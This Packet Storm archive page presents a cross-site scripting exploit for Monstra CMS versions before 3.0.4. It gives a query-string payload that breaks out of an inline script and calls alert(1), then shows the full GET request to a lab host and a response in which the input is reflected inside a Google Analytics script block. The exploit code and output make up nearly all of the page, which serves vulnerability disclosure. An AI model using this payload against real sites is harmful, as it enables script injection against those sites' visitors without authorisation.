exploit the possibilities

Monstra CMS Cross Site Scripting

Monstra CMS Cross Site Scripting
Posted May 18, 2018
Authored by Berk Dusunur

Monstra CMS versions prior to 3.0.4 suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 1f1f0e7cdd0eff105e7fcaf27d217cef

Monstra CMS Cross Site Scripting

Change Mirror Download
# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting
# Date: 2018-05-17
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://monstra.org
# Software Link: https://monstra.org
# Version: before 3.0.4
# Tested on: Pardus / Win10 AppServer

# Proof Of Concept
# Monstra is a modern and lightweight Content Management System.
# Prints get request between script tags on page


Payload ?vrk2f'-alert(1)-'ax8vv=1

GET Request

GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1
Host: 192.168.1.106
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Response


<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new
Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js
','_mga');

_mga('create', '', 'auto');
_mga('send', 'pageview', {
'page': 'http://192.168.1.106/test/monstra-3.0.4/?vrk2f%27-alert(1',
'title': ''
});
</script></body>


http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close